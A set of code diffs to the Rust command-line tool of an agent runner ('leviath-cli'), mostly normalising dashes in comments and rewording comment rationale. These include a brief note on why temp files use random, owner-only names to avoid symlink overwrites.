     println!("  {}", builtin_names.join(", "));
     println!();
@@ -217,7 +217,7 @@ fn get_agents_dir_or_error(dir: Option<PathBuf>) -> anyhow::Result<PathBuf> {
 ///
 /// A thin wrapper over [`get_agents_dir_or_error`] supplying the real
 /// resolved directory. The `#[cfg(test)]` guard below only lets tests force the
-/// "no home directory" error arm of `execute()` deterministically — the real
+/// "no home directory" error arm of `execute()` deterministically - the real
 /// the shared resolver can't be made to return `None` in any environment a
 /// test may safely create (on macOS `dirs::home_dir()` falls back to a
 /// passwd-database lookup independent of `$HOME`). It does NOT hide the real
@@ -304,7 +304,7 @@ system = {{ kind = "pinned", max_tokens = 1000 }}
     #[test]
     fn scan_directory_path_is_a_file_returns_empty() {
         // `dir.exists()` is true for a plain file too, so this reaches
-        // `fs::read_dir(dir)` -- which fails with "not a directory",
+        // `fs::read_dir(dir)` - which fails with "not a directory",
         // exercising the `if let Ok(entries) = ...` construct's implicit
         // (no-`else`) false arm that no other test hits.
         let tmp = tempfile::tempdir().unwrap();
@@ -318,7 +318,7 @@ system = {{ kind = "pinned", max_tokens = 1000 }}
     fn scan_directory_direct_manifest_invalid_is_skipped() {
         // The direct-manifest branch (as opposed to the subdirectory-scan
         // branch, covered separately by `scan_directory_subdir_with_invalid_manifest`)
-        // has its own `if let Some(info) = read_agent_info(...)` — this
+        // has its own `if let Some(info) = read_agent_info(...)` - this
         // exercises that branch's `None` arm when the manifest at the
         // directory's own root is present but unparseable.
         let dir = tempfile::tempdir().unwrap();
@@ -494,7 +494,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     #[tokio::test]
     async fn execute_falls_back_to_default_config_when_config_file_is_malformed() {
         // `execute`'s `Config::load().unwrap_or_default()` can only take
-        // its fallback arm when `Config::load()` errors -- every other
+        // its fallback arm when `Config::load()` errors - every other
         // `execute()` test sees either no config file (defaults) or a
         // well-formed one. Redirecting `LEVIATH_CONFIG_PATH` to malformed
         // TOML (the same technique as `config.rs`'s
@@ -549,7 +549,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     // sequence isn't reproducible: NTFS/Win32 refuse to remove a directory
     // that's a live process's current working directory (a sharing
     // violation), so `remove_dir_all` itself fails there instead of
-    // succeeding -- confirmed via real Windows CI. Unix-only.
+    // succeeding - confirmed via real Windows CI. Unix-only.
     #[cfg(unix)]
     #[tokio::test]
     async fn execute_falls_back_to_default_cwd_when_current_dir_is_gone() {
@@ -603,7 +603,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     #[test]
     fn print_agent_listing_nothing_installed() {
         // The bundled catalog is always non-empty, so it must not count as
-        // "you have agents" -- otherwise the get-started guidance would be
+        // "you have agents" - otherwise the get-started guidance would be
         // suppressed for exactly the fresh install that needs it.
         let agents_dir = tempfile::tempdir().unwrap();
         let cwd = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/commands/list.rs
+++ b/crates/leviath-cli/src/commands/list.rs
@@ -167,11 +167,11 @@ fn print_agent_listing(
 
     // 4. Bundled agents - the blueprints embedded in this binary.
     //
-    // This used to scan `<exe_dir>/agents`, a directory no real install has, so
-    // the section never printed outside a git checkout. It now reports the
-    // embedded catalog, which is what `lev setup` installs from; the on-disk
-    // scan stays as a second source so a checkout or a packaging layout that
-    // *does* ship an `agents/` dir next to the binary still shows up.
+    // Reports the embedded catalog, which is what `lev setup` installs from.
+    // Scanning only `<exe_dir>/agents` would leave this section blank outside a
+    // git checkout - a directory no real install has. The on-disk scan stays as
+    // a second source so a checkout or a packaging layout that *does* ship an
+    // `agents/` dir next to the binary still shows up.
     let mut builtin_names: Vec<String> = crate::bundled::BUNDLED_AGENTS
         .iter()
         .map(|a| format!("{} (v{})", a.name, a.version))

--- a/crates/leviath-cli/src/commands/mcp.rs
+++ b/crates/leviath-cli/src/commands/mcp.rs
@@ -1,4 +1,4 @@
-//! `lev mcp` — manage MCP tool servers and their authentication.
+//! `lev mcp` - manage MCP tool servers and their authentication.
 //!
 //! Adding a server that requires OAuth starts the browser login automatically,
 //! the way Claude Code and other clients do, so setup is a single command.
@@ -177,7 +177,7 @@ async fn add_server(add: AddArgs, env: &McpEnv) -> anyhow::Result<()> {
     config.save_to_path_public(&env.config_path)?;
     println!("Added MCP server '{}'.", server.name);
 
-    // Auto-login for an HTTP server that isn't opted out — this is what makes
+    // Auto-login for an HTTP server that isn't opted out - this is what makes
     // `add` a one-step setup for an authenticated server.
     if is_http && !add.no_login {
         match login(&server.name, env).await {
@@ -343,7 +343,7 @@ struct ServerRow {
 
 impl ServerRow {
     fn describe(server: &MCPServerConfig, store: &AuthStore, now: u64) -> Self {
-        // A malformed entry still lists — with its problem shown — rather than
+        // A malformed entry still lists - with its problem shown - rather than
         // being hidden.
         let (transport, endpoint) = match server.resolve() {
             Ok(leviath_mcp::ResolvedTransport::Stdio { command, .. }) => {
@@ -605,7 +605,7 @@ mod tests {
     async fn list_of_nothing_is_friendly() {
         let dir = tempfile::tempdir().unwrap();
         let env = env_at(dir.path(), never_opens, 0);
-        // No config file yet; list must still succeed with an empty result —
+        // No config file yet; list must still succeed with an empty result -
         // routed through execute_with to cover the List dispatch arm.
         execute_with(
             McpArgs {

--- a/crates/leviath-cli/src/commands/mcp.rs
+++ b/crates/leviath-cli/src/commands/mcp.rs
@@ -96,7 +96,7 @@ pub struct McpEnv {
     pub now: u64,
     /// The global Rhai script-tools directory (`<leviath-home>/tools/`). `lev mcp
     /// list` also surfaces these tools (labeled `script`) so the listing covers
-    /// every external tool provider, not only MCP servers (issue #97). `None`
+    /// every external tool provider, not only MCP servers. `None`
     /// disables the script scan (used by tests that only care about servers).
     pub tools_dir: Option<std::path::PathBuf>,
     /// Where OAuth grants are kept, already resolved. `lev mcp login` writes a

--- a/crates/leviath-cli/src/commands/models.rs
+++ b/crates/leviath-cli/src/commands/models.rs
@@ -69,7 +69,7 @@ struct BuiltinEntry {
 /// specified.  Remote results override these values for identical model IDs.
 fn builtin_table() -> Vec<BuiltinEntry> {
     macro_rules! entry {
-        // Short form — tools defaults to true
+        // Short form - tools defaults to true
         ($provider:expr_2021, $id:expr_2021, $name:expr_2021,
          temp=$t:expr_2021, ctx=$ctx:expr_2021, out=$out:expr_2021) => {
             entry!(
@@ -82,7 +82,7 @@ fn builtin_table() -> Vec<BuiltinEntry> {
                 out = $out
             )
         };
-        // Full form — explicit tools flag
+        // Full form - explicit tools flag
         ($provider:expr_2021, $id:expr_2021, $name:expr_2021,
          temp=$t:expr_2021, tools=$to:expr_2021, ctx=$ctx:expr_2021, out=$out:expr_2021) => {
             BuiltinEntry {
@@ -168,7 +168,7 @@ fn builtin_table() -> Vec<BuiltinEntry> {
             out = 65_536
         ),
         // ── OpenAI ─────────────────────────────────────────────────────────────
-        // GPT-5.5 — flagship (Apr 2026), 1M+ context
+        // GPT-5.5 - flagship (Apr 2026), 1M+ context
         entry!(
             "openai",
             "gpt-5.5",
@@ -363,7 +363,7 @@ fn builtin_table() -> Vec<BuiltinEntry> {
 /// each call site's monomorphization of this function separately, and it
 /// has been observed to report the production instantiation as 0-hit even
 /// though it's genuinely exercised by `execute_list_command_runs_without_error`
-/// et al. -- the same instantiation-merging undercount documented for
+/// et al. - the same instantiation-merging undercount documented for
 /// `run_stage_loop` (see `run/worker.rs`'s `run_worker_inner` and
 /// `run/session.rs`'s `resolve_task_with`, which use the same fix). A
 /// `&dyn Fn` trait object is one concrete type regardless of what closure is
@@ -400,14 +400,14 @@ async fn list_with_registry(
             }
 
             // `registry.get(provider_name)` is structurally guaranteed
-            // `Some` here -- `provider_name` comes from
+            // `Some` here - `provider_name` comes from
             // `registry.provider_names()` just above, and both methods read
             // the same underlying map (see `leviath-runtime/src/engine.rs`'s
             // `ProviderRegistry`). There is no way to construct a registry
             // where a name from `provider_names()` isn't `get()`-able, so
             // `.expect()` documents that invariant instead of leaving a
             // defensive-but-unreachable `if let` branch permanently
-            // uncovered -- the same choice already made by
+            // uncovered - the same choice already made by
             // `commands/serve/config.rs`'s `get_models` for this identical
             // pattern.
             let provider = registry
@@ -451,8 +451,8 @@ async fn list_with_registry(
 
     if entries.is_empty() {
         // `entries` starts from `builtin_table()`, which is a hardcoded,
-        // permanently non-empty static list (see `builtin_table_is_not_empty`)
-        // -- the only way to reach an empty `entries` here is the provider
+        // permanently non-empty static list (see `builtin_table_is_not_empty`) -
+        // the only way to reach an empty `entries` here is the provider
         // filter above removing every entry, which requires `args.provider`
         // to be `Some`. So `args.provider.is_some()` is always true at this
         // point; printing the hint unconditionally documents that invariant
@@ -500,7 +500,7 @@ async fn list_with_registry(
 
 // ─── show ─────────────────────────────────────────────────────────────────────
 
-/// Core of [`show`], with provider-registry construction injected -- see
+/// Core of [`show`], with provider-registry construction injected - see
 /// [`list_with_registry`] for why.
 async fn show_with_registry(
     args: ShowArgs,
@@ -566,7 +566,7 @@ async fn show_with_registry(
         }
     }
 
-    // 4. Not found anywhere — print a helpful message with a TOML snippet.
+    // 4. Not found anywhere - print a helpful message with a TOML snippet.
     println!("Model '{}' not found.", model_id);
     println!(
         "Add it to {} under [model_capabilities.'{}']",
@@ -1046,7 +1046,7 @@ mod tests {
 
     #[tokio::test]
     async fn list_with_openai_filter() {
-        // See the comment on list_with_openrouter_filter -- same real
+        // See the comment on list_with_openrouter_filter - same real
         // Config::load() race.
         crate::config::with_isolated_config_path_async(
             "models-list-openai-filter",
@@ -1066,7 +1066,7 @@ mod tests {
 
     #[tokio::test]
     async fn show_builtin_anthropic_opus() {
-        // See the comment on list_with_openrouter_filter -- same real
+        // See the comment on list_with_openrouter_filter - same real
         // Config::load() race.
         crate::config::with_isolated_config_path_async(
             "models-show-anthropic-opus",
@@ -1087,7 +1087,7 @@ mod tests {
 
     #[tokio::test]
     async fn show_builtin_openai_model() {
-        // See the comment on list_with_openrouter_filter -- same real
+        // See the comment on list_with_openrouter_filter - same real
         // Config::load() race.
         crate::config::with_isolated_config_path_async(
             "models-show-openai-model",
@@ -1108,7 +1108,7 @@ mod tests {
 
     #[tokio::test]
     async fn show_builtin_deepseek_r1() {
-        // See the comment on list_with_openrouter_filter -- same real
+        // See the comment on list_with_openrouter_filter - same real
         // Config::load() race.
         crate::config::with_isolated_config_path_async(
             "models-show-deepseek-r1",
@@ -1377,7 +1377,7 @@ mod tests {
     ) -> impl Fn(&Config) -> leviath_runtime::ProviderRegistry {
         // `Fn` (not `FnOnce`) so the closure can be called through the
         // `&dyn Fn` trait object `list_with_registry`/`show_with_registry`
-        // now take -- see the doc comment on `list_with_registry` for why.
+        // now take - see the doc comment on `list_with_registry` for why.
         // Only ever actually invoked once per test, but `Fn`'s "may be
         // called more than once" contract means captured state can't be
         // moved out on each call, hence the clone.

--- a/crates/leviath-cli/src/commands/pack.rs
+++ b/crates/leviath-cli/src/commands/pack.rs
@@ -271,7 +271,7 @@ mod tests {
     #[test]
     fn count_path_neither_file_nor_dir_counts_zero() {
         // A nonexistent path is neither a file nor a directory, so `count_path`
-        // contributes 0 -- covering the `else` arm on every platform.
+        // contributes 0 - covering the `else` arm on every platform.
         let dir = tempfile::tempdir().unwrap();
         let missing = dir.path().join("does-not-exist");
         assert_eq!(count_path(&missing, &real_read_dir), 0);
@@ -508,7 +508,7 @@ mod tests {
 
     #[tokio::test]
     async fn execute_invalid_manifest_toml_errors() {
-        // Manifest exists but is invalid TOML — covers parse_manifest ? on line 30.
+        // Manifest exists but is invalid TOML - covers parse_manifest ? on line 30.
         with_tracing(|| {});
         let project = tempfile::tempdir().unwrap();
         std::fs::write(project.path().join("agent.leviath"), "not valid toml ][").unwrap();

--- a/crates/leviath-cli/src/commands/policy.rs
+++ b/crates/leviath-cli/src/commands/policy.rs
@@ -60,7 +60,7 @@ pub(crate) fn load_policy() -> anyhow::Result<leviath_core::PolicyConfig> {
     load_policy_from(&policy_path())
 }
 
-/// Load the policy config from a specific path — split out from `load_policy`
+/// Load the policy config from a specific path - split out from `load_policy`
 /// (which injects the real default path) so the parse-error and missing-file
 /// arms are unit-testable without touching the user's real config.
 fn load_policy_from(path: &std::path::Path) -> anyhow::Result<leviath_core::PolicyConfig> {
@@ -244,7 +244,7 @@ fn execute_add_with(
 
     // Serialize and write. `PolicyConfig` is a struct of arrays-of-tables
     // (`allowlist`) followed by a table (`mcp_overrides`), whose entries hold
-    // only inline values — there is no primitive-after-table ordering hazard,
+    // only inline values - there is no primitive-after-table ordering hazard,
     // so TOML serialization cannot fail.
     let toml_str = toml::to_string_pretty(&config)
         .expect("infallible: PolicyConfig always serializes to TOML");
@@ -428,7 +428,7 @@ mod tests {
 
     #[test]
     fn load_policy_from_read_error_propagates() {
-        // The path exists but is a directory, so read_to_string fails —
+        // The path exists but is a directory, so read_to_string fails -
         // exercising load_policy_from's `read_to_string(path)?` error arm.
         let dir = tempfile::tempdir().unwrap();
         assert!(load_policy_from(dir.path()).is_err());
@@ -443,7 +443,7 @@ mod tests {
     #[test]
     fn execute_list_with_read_dir_error_propagates() {
         // `rules` exists but is a regular file (not a directory), so read_dir
-        // fails — exercising execute_list_with's `read_dir(rules)?` error arm.
+        // fails - exercising execute_list_with's `read_dir(rules)?` error arm.
         let dir = tempfile::tempdir().unwrap();
         let rules_file = dir.path().join("rules");
         std::fs::write(&rules_file, "i am a file, not a dir").unwrap();
@@ -1025,7 +1025,7 @@ mod tests {
     #[test]
     fn add_with_parent_that_is_a_file_errors() {
         // When the target path's parent is an existing regular file,
-        // create_dir_all fails and the `?` propagates — covers the error arm.
+        // create_dir_all fails and the `?` propagates - covers the error arm.
         let dir = tempfile::tempdir().unwrap();
         let file_as_parent = dir.path().join("iamafile");
         std::fs::write(&file_as_parent, "not a dir").unwrap();

--- a/crates/leviath-cli/src/commands/ps.rs
+++ b/crates/leviath-cli/src/commands/ps.rs
@@ -1,4 +1,4 @@
-//! `lev ps` — list the agents running in the shared-world daemon.
+//! `lev ps` - list the agents running in the shared-world daemon.
 //!
 //! Queries the daemon over its control socket and prints one line per run. The
 //! query + formatting cores are tested here; the socket-path resolution + connect

--- a/crates/leviath-cli/src/commands/remove.rs
+++ b/crates/leviath-cli/src/commands/remove.rs
@@ -24,7 +24,7 @@ fn remove_agent(installer: &leviath_package::AgentInstaller, name: &str) -> anyh
 ///
 /// The `uninstall` closure is a trait object so its failure arm can be
 /// exercised on every platform: a genuinely installed agent (which
-/// `get_installed` requires -- an `agent.leviath` under the agent dir) is an
+/// `get_installed` requires - an `agent.leviath` under the agent dir) is an
 /// ordinary removable directory, so `remove_dir_all` only fails on it via a
 /// Unix-only `chmod` on the parent. Production always passes the real
 /// `installer.uninstall`.
@@ -117,7 +117,7 @@ mod tests {
     // ─── execute() ───────────────────────────────────────────────────────
     //
     // `execute()` always constructs a real `AgentInstaller::new()` pointed at
-    // the developer's real `~/.leviath/agents` -- there's no env-var seam for
+    // the developer's real `~/.leviath/agents` - there's no env-var seam for
     // it (unlike `Config`'s `LEVIATH_CONFIG_PATH`), so this can't be driven
     // through a real install/uninstall round trip without touching that real
     // directory. It's still safe to exercise the not-installed error path:

--- a/crates/leviath-cli/src/commands/run/manifest.rs
+++ b/crates/leviath-cli/src/commands/run/manifest.rs
@@ -107,9 +107,9 @@ mod tests {
 
     /// Name lookup goes through the `LEVIATH_HOME`-aware agents dir, so
     /// `lev run <name>` finds the same tree `lev add` installs into when the
-    /// override is set. It resolved through the raw OS home before, which made
+    /// override is set. Resolving through the raw OS home would make
     /// installed-by-name agents invisible in any redirected environment (and
-    /// forced this very test to write into the developer's real home).
+    /// force this very test to write into the developer's real home).
     #[test]
     fn find_manifest_installed_agent_by_name_honors_leviath_home() {
         let home = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/commands/run/manifest.rs
+++ b/crates/leviath-cli/src/commands/run/manifest.rs
@@ -97,7 +97,7 @@ mod tests {
 
     #[test]
     fn find_manifest_with_invalid_path() {
-        // See CWD_LOCK's doc comment -- branch 4 depends on CWD state.
+        // See CWD_LOCK's doc comment - branch 4 depends on CWD state.
         let _guard = CWD_LOCK
             .lock()
             .unwrap_or_else(std::sync::PoisonError::into_inner);
@@ -128,19 +128,19 @@ mod tests {
     #[test]
     fn find_manifest_dir_without_manifest_falls_through() {
         // Branch 4 of find_manifest checks for a bare "agent.leviath" in the
-        // process's current working directory -- process-global state that
+        // process's current working directory - process-global state that
         // find_manifest_cwd_agent_leviath_found deliberately mutates. Without
         // holding CWD_LOCK here too, this test can run while CWD is
         // temporarily pointed at that other test's directory (which does
         // contain agent.leviath), observe branch 4 succeed, and fail this
-        // assertion nondeterministically -- confirmed on CI.
+        // assertion nondeterministically - confirmed on CI.
         let _guard = CWD_LOCK
             .lock()
             .unwrap_or_else(std::sync::PoisonError::into_inner);
         let dir = std::env::temp_dir().join("lev-test-dir-no-manifest-9z7q");
         let _ = std::fs::remove_dir_all(&dir);
         std::fs::create_dir_all(&dir).unwrap();
-        // No agent.leviath inside — the dir branch falls through to the error.
+        // No agent.leviath inside - the dir branch falls through to the error.
         let result = find_manifest(dir.to_str().unwrap());
         assert!(result.is_err());
         let _ = std::fs::remove_dir_all(&dir);
@@ -151,7 +151,7 @@ mod tests {
     /// `if installed.exists()` is false, so we fall through to the error.
     #[test]
     fn find_manifest_installed_agent_not_found_falls_through() {
-        // See CWD_LOCK's doc comment -- branch 4 depends on CWD state.
+        // See CWD_LOCK's doc comment - branch 4 depends on CWD state.
         let _guard = CWD_LOCK
             .lock()
             .unwrap_or_else(std::sync::PoisonError::into_inner);

--- a/crates/leviath-cli/src/commands/run/mod.rs
+++ b/crates/leviath-cli/src/commands/run/mod.rs
@@ -1,4 +1,4 @@
-//! `lev run` — run an agent in the shared-world daemon.
+//! `lev run` - run an agent in the shared-world daemon.
 //!
 //! `run` resolves the blueprint + task locally and asks the running daemon (auto-
 //! started if needed) to create the agent in the one shared ECS world. The
@@ -48,7 +48,7 @@ pub struct RunArgs {
     pub max_depth: Option<usize>,
 
     /// Refuse the blueprint's `seed = { command = "..." }` regions. Those run a
-    /// shell command at spawn — before the first inference, and so before any
+    /// shell command at spawn - before the first inference, and so before any
     /// approval prompt. See `lev validate <path>` to inspect them first.
     #[arg(long)]
     pub no_seed_commands: bool,
@@ -60,7 +60,7 @@ pub struct RunArgs {
     pub regions: HashMap<String, String>,
 }
 
-/// The `run` subcommand's own long flags — everything NOT in this set is treated
+/// The `run` subcommand's own long flags - everything NOT in this set is treated
 /// as a dynamic `--<region>` seed flag by [`extract_region_flags`].
 const KNOWN_RUN_FLAGS: &[&str] = &[
     "task",
@@ -82,7 +82,7 @@ const KNOWN_RUN_FLAGS: &[&str] = &[
 ///
 /// A no-`=` region flag consumes the following token as its value. If argv has
 /// no `run` subcommand token, nothing is extracted (the returned argv equals the
-/// input). Pure — no environment or I/O — so it is unit-testable in isolation.
+/// input). Pure - no environment or I/O - so it is unit-testable in isolation.
 pub fn extract_region_flags(argv: Vec<String>) -> (Vec<String>, HashMap<String, String>) {
     // Locate the subcommand: the first bareword (non-`-`) token after the program
     // name. Only activate when it is `run`.

--- a/crates/leviath-cli/src/commands/run/session.rs
+++ b/crates/leviath-cli/src/commands/run/session.rs
@@ -137,11 +137,12 @@ fn resolve_task_with_editor(
             let template = build_task_template(agent_name, description);
 
             // A randomly named file created `O_EXCL`, not `lev-task-<pid>.txt`.
-            // The old name was fully predictable, and `fs::write` follows
-            // symlinks: on a shared host another user pre-created that path as a
-            // link to `~/.leviath/config.toml` or `~/.ssh/authorized_keys`, and
-            // the next `lev run` wrote the template - and then everything the
-            // user typed into their editor - straight through it. `tempfile`
+            // A predictable name is an attack surface because `fs::write`
+            // follows symlinks: on a shared host another user pre-creates that
+            // path as a link to `~/.leviath/config.toml` or
+            // `~/.ssh/authorized_keys`, and the next `lev run` writes the
+            // template - and then everything the user types into their editor -
+            // straight through it. `tempfile`
             // also creates it owner-only, so the task prompt is not world
             // readable while the editor holds it open.
             let tmp = write_task_template(&tmp_dir_fn(), &template)?;
@@ -434,7 +435,7 @@ pub fn provider_creds_from_config(config: &Config) -> Vec<ProviderCreds> {
 ///
 /// Native providers are registered eagerly from [`provider_creds_from_config`];
 /// a [`ScriptProviderLayer`](leviath_runtime::script_provider::ScriptProviderLayer)
-/// is then attached so Rhai *script providers* (issue #101) resolve lazily and
+/// is then attached so Rhai *script providers* resolve lazily and
 /// hot-reload from `~/.leviath/providers/`.
 pub fn build_provider_registry_from_config(config: &Config) -> ProviderRegistry {
     let registry = build_provider_registry(&provider_creds_from_config(config));

--- a/crates/leviath-cli/src/commands/run/session.rs
+++ b/crates/leviath-cli/src/commands/run/session.rs
@@ -32,7 +32,7 @@ pub fn resolve_task(
 }
 
 /// Same as [`resolve_task`], but with the stdin-is-a-TTY check injected
-/// instead of hardcoded — lets tests deterministically exercise both the
+/// instead of hardcoded - lets tests deterministically exercise both the
 /// "not a TTY" error path and the "is a TTY" editor-launch path regardless
 /// of whether the test runner's own stdin happens to be a real terminal
 /// (e.g. a human running `cargo test` interactively vs. CI).
@@ -44,7 +44,7 @@ pub fn resolve_task(
 /// anonymous types). A generic `impl Trait` parameter gives `rustc` one
 /// monomorphization per call site, and `cargo llvm-cov` sometimes reports a
 /// region as uncovered for one instantiation even though the union of all
-/// instantiations covers every source position -- a confirmed llvm-cov
+/// instantiations covers every source position - a confirmed llvm-cov
 /// limitation (see `xtask/src/coverage.rs`'s doc comment on generic-function
 /// monomorphization). Erasing the closure type with `&dyn Fn` collapses
 /// every call site back down to a single instantiation, avoiding that noise
@@ -85,20 +85,20 @@ pub fn read_region_value(raw: &str) -> anyhow::Result<String> {
 }
 
 /// Same as [`resolve_task_with`], but with the editor launch itself injected
-/// too — lets tests deterministically exercise `launch_editor`'s error
+/// too - lets tests deterministically exercise `launch_editor`'s error
 /// propagating out of `resolve_task_with` (the `result?` a few lines down)
 /// without needing a real failing subprocess/PATH setup. On Windows there is
 /// no safe way to make the real `launch_editor`'s platform-default candidate
 /// (`notepad`, resolved via `System32` unconditionally) fail without
 /// mutating the real system directory, so `resolve_task_with`'s own
 /// `#[cfg(unix)]`-only real-PATH-starvation test for this can't be mirrored
-/// there — injecting the editor launcher closes that gap on every platform.
+/// there - injecting the editor launcher closes that gap on every platform.
 ///
 /// Also takes the temp-directory provider (`tmp_dir_fn`) as an injectable
 /// closure so tests can point the task-template write at a guaranteed-
 /// unwritable directory (e.g. one whose parent doesn't exist) and
 /// deterministically exercise `write_task_template`'s `?` propagating out of
-/// this function -- the real OS temp directory used in production is
+/// this function - the real OS temp directory used in production is
 /// essentially always writable, so that error path is otherwise untestable.
 ///
 /// All closures are `&dyn Fn` for the same monomorphization-noise reason
@@ -140,8 +140,8 @@ fn resolve_task_with_editor(
             // The old name was fully predictable, and `fs::write` follows
             // symlinks: on a shared host another user pre-created that path as a
             // link to `~/.leviath/config.toml` or `~/.ssh/authorized_keys`, and
-            // the next `lev run` wrote the template — and then everything the
-            // user typed into their editor — straight through it. `tempfile`
+            // the next `lev run` wrote the template - and then everything the
+            // user typed into their editor - straight through it. `tempfile`
             // also creates it owner-only, so the task prompt is not world
             // readable while the editor holds it open.
             let tmp = write_task_template(&tmp_dir_fn(), &template)?;
@@ -192,12 +192,12 @@ fn write_task_template(
     use std::io::Write as _;
 
     // Creating and writing in one fallible step, through the handle the builder
-    // opened. Two steps would mean re-opening by path between them — a window in
-    // which the name could be swapped — and a second error arm that a freshly
+    // opened. Two steps would mean re-opening by path between them - a window in
+    // which the name could be swapped - and a second error arm that a freshly
     // created, writable handle can never actually take.
     // A combinator chain rather than `?`s: each `?` would be an error arm that
     // a freshly created, writable handle can never take, and the whole point of
-    // reporting here is the one failure that is real -- the file could not be
+    // reporting here is the one failure that is real - the file could not be
     // created at all.
     tempfile::Builder::new()
         .prefix("lev-task-")
@@ -218,7 +218,7 @@ fn write_task_template(
 /// Extracted into its own pure, injectable function (rather than inlined
 /// directly in [`launch_editor`]) so tests can assert on the Windows
 /// candidate list containing `notepad` without ever having to actually
-/// spawn it — launching a real, blocking, interactive GUI text editor with
+/// spawn it - launching a real, blocking, interactive GUI text editor with
 /// no timeout would hang CI indefinitely.
 fn platform_default_editors() -> Vec<String> {
     #[cfg(unix)]
@@ -244,10 +244,10 @@ fn platform_default_editors() -> Vec<String> {
 /// `ExitStatus`.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 enum EditorRunOutcome {
-    /// Process finished (success, or any explicit exit code) — treat as the
+    /// Process finished (success, or any explicit exit code) - treat as the
     /// user having closed the editor.
     Completed,
-    /// Process ended with no exit code (e.g. killed by a signal) — try the next
+    /// Process ended with no exit code (e.g. killed by a signal) - try the next
     /// candidate.
     Aborted,
 }
@@ -284,7 +284,7 @@ fn launch_editor(path: &std::path::Path) -> anyhow::Result<()> {
 /// *before* `$PATH`, so it can't be made to fail short of tampering with a
 /// real system directory. Injecting `run` lets a single, platform-independent
 /// test force every candidate to fail with `NotFound` without spawning any
-/// process at all -- proving the `bail!` is reachable production code on
+/// process at all - proving the `bail!` is reachable production code on
 /// every platform, not a permanent gap.
 ///
 /// `run` is `&mut dyn FnMut` rather than `impl FnMut` for the same
@@ -329,12 +329,12 @@ fn launch_editor_with(
         cmd.arg(path_str.as_ref());
 
         match run(&mut cmd) {
-            // Exited (even non-zero means the user closed it — treat as OK).
+            // Exited (even non-zero means the user closed it - treat as OK).
             Ok(EditorRunOutcome::Completed) => {
                 return Ok(());
             }
             Ok(EditorRunOutcome::Aborted) => {
-                // Ended with no exit code (e.g. killed by signal on Unix) —
+                // Ended with no exit code (e.g. killed by signal on Unix) -
                 // try the next candidate.
             }
             Err(e) if e.kind() == std::io::ErrorKind::NotFound => {
@@ -403,7 +403,7 @@ pub fn provider_creds_from_config(config: &Config) -> Vec<ProviderCreds> {
     // Claude Code needs no API key, but it is opt-in rather than always-on: the
     // CLI puts the user's account email address into every call and that cannot
     // be turned off. Leaving it unregistered is also how it stays out of an
-    // agent's model fallback chain — `resolve_stage_model` skips any provider
+    // agent's model fallback chain - `resolve_stage_model` skips any provider
     // the registry doesn't have.
     if config.providers.claude_code_enabled {
         let mut options = std::collections::HashMap::new();
@@ -692,7 +692,7 @@ mod tests {
         let registry = build_provider_registry_from_config(&config);
         // Ollama needs no key and is always on.
         assert!(registry.has("ollama"));
-        // Claude Code needs no key either, but is opt-in — a default config
+        // Claude Code needs no key either, but is opt-in - a default config
         // must not reach the user's Claude subscription (or send their account
         // email to it) without them having said yes.
         assert!(!registry.has("claude-code"));
@@ -844,7 +844,7 @@ mod tests {
         assert!(registry.has("google"));
         assert!(registry.has("openrouter"));
         assert!(registry.has("ollama"));
-        // Every key in the world doesn't enable Claude Code — only opting in does.
+        // Every key in the world doesn't enable Claude Code - only opting in does.
         assert!(!registry.has("claude-code"));
     }
 
@@ -1112,7 +1112,7 @@ mod tests {
     fn resolve_task_none_arg_errors_when_stdin_not_tty() {
         // The TTY check is injected (not the real std::io::stdin()) so this
         // is deterministic regardless of whether the test runner's own
-        // stdin happens to be a real terminal — a human running `cargo test`
+        // stdin happens to be a real terminal - a human running `cargo test`
         // interactively has a real TTY on stdin, unlike CI, so hardcoding
         // "stdin is never a TTY under cargo test" was a false assumption.
         let result = resolve_task_with(&None, "test-agent", None, &|| false);
@@ -1149,11 +1149,11 @@ mod tests {
     // ─── launch_editor: VISUAL takes priority and succeeds ───────────────
 
     // These `launch_editor` tests point VISUAL/EDITOR at `/usr/bin/true` (or
-    // rely on PATH-starvation to prevent any editor being found) -- both
+    // rely on PATH-starvation to prevent any editor being found) - both
     // assumptions are Unix-only. On Windows, `/usr/bin/true` doesn't exist,
     // so the NotFound-branch falls through to the windows-only "notepad"
     // candidate, which Windows resolves via its System32 search path
-    // *regardless* of $PATH -- so PATH-starvation doesn't stop it either.
+    // *regardless* of $PATH - so PATH-starvation doesn't stop it either.
     // Either way that means launching a real, blocking GUI text editor with
     // no timeout, which hung a Windows CI run indefinitely. Gated to `unix`.
     #[cfg(unix)]
@@ -1210,7 +1210,7 @@ mod tests {
                 std::fs::write(&file, "content").unwrap();
 
                 // A non-zero-but-present exit code is treated as the user having
-                // closed the editor -- not an error.
+                // closed the editor - not an error.
                 let result = launch_editor(&file);
                 assert_launch_ok(&result);
 
@@ -1356,7 +1356,7 @@ mod tests {
             let result = launch_editor_with(&file, &mut |_cmd| {
                 // Ignores the actual candidate `launch_editor_with` resolved to
                 // (the platform default, since VISUAL/EDITOR are both empty) and
-                // spawns the current test binary instead -- any exit status it
+                // spawns the current test binary instead - any exit status it
                 // produces (even a nonzero "unrecognized option" error) classifies
                 // as `Completed`.
                 std::process::Command::new(std::env::current_exe().unwrap())
@@ -1375,7 +1375,7 @@ mod tests {
     // Unlike the whitespace-only case above (non-empty string, pushed as a
     // candidate that then fails to split into any usable parts), a truly
     // empty `VISUAL`/`EDITOR` value never even gets pushed onto the
-    // candidates list -- exercising the `!v.is_empty()`/`!e.is_empty()`
+    // candidates list - exercising the `!v.is_empty()`/`!e.is_empty()`
     // false arm for both. With both vars empty, resolution falls through to
     // the unix platform defaults (vim/nano/vi) unless PATH is also starved --
     // so this test combines the empty-string case with the same
@@ -1401,7 +1401,7 @@ mod tests {
 
                 // Neither empty var is pushed as a candidate, and PATH starvation
                 // means even the unix platform defaults (vim/nano/vi) fail to
-                // resolve -- so this deterministically reaches "no editor found"
+                // resolve - so this deterministically reaches "no editor found"
                 // rather than ever spawning a real editor.
                 let result = launch_editor(&file);
                 assert!(result.is_err());
@@ -1448,7 +1448,7 @@ mod tests {
         let dir = std::env::temp_dir().join("lev-test-launch-editor-perm-denied");
         let _ = std::fs::create_dir_all(&dir);
         // A regular, non-executable file: spawning it directly fails with
-        // `PermissionDenied`, not `NotFound` -- exercising the generic
+        // `PermissionDenied`, not `NotFound` - exercising the generic
